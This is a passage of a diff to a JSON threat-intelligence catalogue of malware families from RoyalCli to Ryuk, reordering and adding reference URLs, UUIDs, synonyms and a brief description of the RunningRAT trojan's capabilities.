- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ac04d0b0-c6b5-4125-acd7-c58dfe7ad4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72",
"value": "RoyalCli"
},
@@ -40065,9 +42217,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
],
"synonyms": [],
"type": []
@@ -40075,14 +42227,49 @@
"uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a",
"value": "Royal DNS"
},
+ {
+ "description": "Ransomware",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html",
+ "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html",
+ "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/",
+ "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/",
+ "https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal",
+ "https://www.coalitioninc.com/blog/active-exploitation-firewalls",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/royal-ransomware/",
+ "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://securityscorecard.pathfactory.com/research/the-royal-ransomware",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware",
+ "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a",
+ "https://socradar.io/dark-web-profile-royal-ransomware/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.cybereason.com/blog/royal-ransomware-analysis"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "df1baad8-e4b6-4507-964c-6e9a8dd5252c",
+ "value": "Royal Ransom (Windows)"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena",
+ "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor",
"https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/",
"https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors",
- "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor",
"https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena"
],
"synonyms": [],
@@ -40096,14 +42283,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm",
- "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
- "https://www.youtube.com/watch?v=YXnNO3TipvM",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
"https://jonahacks.medium.com/malware-analysis-manual-unpacking-of-redaman-ec1782352cfb",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html",
- "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.youtube.com/watch?v=YXnNO3TipvM",
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
],
"synonyms": [
"Redaman"
@@ -40113,13 +42300,28 @@
"uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
"value": "RTM"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/read-the-manual-locker-a-private-raas-provider.html"
+ ],
+ "synonyms": [
+ "Read The Manual Locker"
+ ],
+ "type": []
+ },
+ "uuid": "b299d033-7772-44a6-a8e0-6b8c5f8af5c6",
+ "value": "RTM Locker"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
- "http://reversing.fun/posts/2022/01/30/rtpos.html"
+ "http://reversing.fun/posts/2022/01/30/rtpos.html",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf"
],
"synonyms": [],
"type": []
@@ -40137,15 +42339,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d70bd6a8-5fd4-42e8-8e39-fb18daeccdb2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2",
"value": "Ruckguv"
},
@@ -40162,25 +42355,28 @@
"value": "Rumish"
},
{
- "description": "",
+ "description": "NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ ],
+ "synonyms": [
+ "running_rat"
],
- "synonyms": [],
"type": []
},
"uuid": "b746a645-5974-44db-a811-a024214b7fba",
- "value": "running_rat"
+ "value": "Running RAT"
},
{
"description": "RURansom shows characteristics of typical ransomware, but despite its name, TrendMicro's assumptions after analysis showed that this malware is more a wiper than ransomware, because the irreversible destruction of encrypted files.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ruransom",
+ "https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/",
"https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html",
- "https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html",
- "https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/"
+ "https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html"
],
"synonyms": [],
"type": []
@@ -40208,16 +42404,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock",
- "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
+ "https://darknetdiaries.com/episode/110/",
"http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
"https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/",
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
+ "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
"https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://darknetdiaries.com/episode/110/",
- "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf",
- "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/",
"https://www.secureworks.com/blog/research-21041",
- "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf"
+ "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/",
+ "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
+ "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf"
],
"synonyms": [],
"type": []
@@ -40230,169 +42426,170 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk",
- "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://community.riskiq.com/article/c88cf7e6",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021",
- "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://twitter.com/SecurityJoes/status/1402603695578157057",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
+ "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
"https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
- "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
- "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
- "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
- "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://twitter.com/Prosegur/status/1199732264386596864",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
- "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
- "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
"https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html",
"https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://twitter.com/SophosLabs/status/1321844306970251265",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.youtube.com/watch?v=Of_KjNG9DHc",
+ "https://community.riskiq.com/article/c88cf7e6",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
"https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/",
+ "https://twitter.com/IntelAdvanced/status/1353546534676258816",
+ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://www.youtube.com/watch?v=HwfRxjV2wok",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
+ "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html",
+ "https://0xchina.medium.com/malware-reverse-engineering-31039450af27",
+ "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://twitter.com/Prosegur/status/1199732264386596864",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://blog.cyberint.com/ryuk-crypto-ransomware",
+ "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
+ "https://www.youtube.com/watch?v=CgDtm05qApE",
+ "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
+ "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
+ "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
+ "https://twitter.com/ffforward/status/1324281530026524672",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.youtube.com/watch?v=7xxRunBP5XA",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
+ "https://twitter.com/SecurityJoes/status/1402603695578157057",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
+ "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
+ "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
+ "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
